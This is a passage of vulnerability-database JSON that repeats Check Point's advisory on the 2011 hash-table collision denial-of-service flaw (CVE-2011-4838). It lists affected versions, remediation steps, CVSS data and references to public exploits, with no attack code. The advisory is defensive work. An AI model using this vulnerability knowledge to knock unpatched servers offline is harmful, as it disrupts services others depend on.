"OPENVAS:1361412562310863706", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:70754", "OPENVAS:863921", "OPENVAS:881119"]}, {"type": "nessus", "idList": ["FEDORA_2012-1262.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "GENTOO_GLSA-201207-06.NASL", "CENTOS_RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SOLARIS11_RUBY_20120417.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "ALA_ALAS-2012-35.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2012-0420.NASL", "FEDORA_2011-17542.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069", "CESA-2012:0093", "CESA-2012:0092"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3EA60213F3", "FEDORA:4930D21410", "FEDORA:BFF2C21133", "FEDORA:3515C213E6", "FEDORA:76D5120DE0", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0092", "RHSA-2012:0070"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-02T03:11:03", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-02T03:11:03", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-02T23:10:27", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-03T15:17:39", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4885", "CVE-2011-4838"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:72454", "SSV:30071", "SSV:30001", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122001", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310120218", "OPENVAS:863681", "OPENVAS:870638", "OPENVAS:863712", "OPENVAS:1361412562310881119", "OPENVAS:831554", "OPENVAS:136141256231070754", "OPENVAS:881167", "OPENVAS:1361412562310870638", "OPENVAS:136141256231071568", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310863921", "OPENVAS:71568", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:70754", "OPENVAS:863921", "OPENVAS:881119"]}, {"type": "nessus", "idList": ["FEDORA_2012-1262.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "GENTOO_GLSA-201207-06.NASL", "CENTOS_RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SOLARIS11_RUBY_20120417.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "ALA_ALAS-2012-35.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2012-0420.NASL", "FEDORA_2011-17542.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069", "CESA-2012:0093", "CESA-2012:0092"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3EA60213F3", "FEDORA:4930D21410", "FEDORA:BFF2C21133", "FEDORA:3515C213E6", "FEDORA:76D5120DE0", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0092", "RHSA-2012:0070"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-02T03:11:03", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-02T03:11:03", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-03T15:17:39", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-03T23:07:08", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4885", "CVE-2011-4838"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:72454", "SSV:30071", "SSV:30001", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122001", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310120218", "OPENVAS:863681", "OPENVAS:870638", "OPENVAS:863712", "OPENVAS:1361412562310881119", "OPENVAS:831554", "OPENVAS:136141256231070754", "OPENVAS:881167", "OPENVAS:1361412562310870638", "OPENVAS:136141256231071568", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310863921", "OPENVAS:71568", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:70754", "OPENVAS:863921", "OPENVAS:881119"]}, {"type": "nessus", "idList": ["FEDORA_2012-1262.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "GENTOO_GLSA-201207-06.NASL", "CENTOS_RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SOLARIS11_RUBY_20120417.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "ALA_ALAS-2012-35.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2012-0420.NASL", "FEDORA_2011-17542.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069", "CESA-2012:0093", "CESA-2012:0092"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3EA60213F3", "FEDORA:4930D21410", "FEDORA:BFF2C21133", "FEDORA:3515C213E6", "FEDORA:76D5120DE0", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0092", "RHSA-2012:0070"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-02T03:11:03", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-02T03:11:03", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-03T23:07:08", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-04T19:13:09", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4885", "CVE-2011-4838"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:72454", "SSV:30071", "SSV:30001", "SSV:26121"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122001", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310120218", "OPENVAS:863681", "OPENVAS:870638", "OPENVAS:863712", "OPENVAS:1361412562310881119", "OPENVAS:831554", "OPENVAS:136141256231070754", "OPENVAS:881167", "OPENVAS:1361412562310870638", "OPENVAS:136141256231071568", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310863921", "OPENVAS:71568", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310863706", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:70754", "OPENVAS:863921", "OPENVAS:881119"]}, {"type": "nessus", "idList": ["FEDORA_2012-1262.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "GENTOO_GLSA-201207-06.NASL", "CENTOS_RHSA-2012-0070.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "SOLARIS11_RUBY_20120417.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "CENTOS_RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "ALA_ALAS-2012-35.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2012-0420.NASL", "FEDORA_2011-17542.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2011-17551.NASL", "REDHAT-RHSA-2012-0069.NASL", "FREEBSD_PKG_D39218103C8011E197E800215C6A37BB.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069", "CESA-2012:0093", "CESA-2012:0092"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:3EA60213F3", "FEDORA:4930D21410", "FEDORA:BFF2C21133", "FEDORA:3515C213E6", "FEDORA:76D5120DE0", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-041", "ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0070", "ELSA-2012-0069"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0092", "RHSA-2012:0070"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116", "RUBY:RUBY-2011-4815-78118"]}], "modified": "2021-11-02T03:11:03", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-02T03:11:03", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-04T19:13:09", "differentElements": ["modified", "published"], "edition": 9}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * 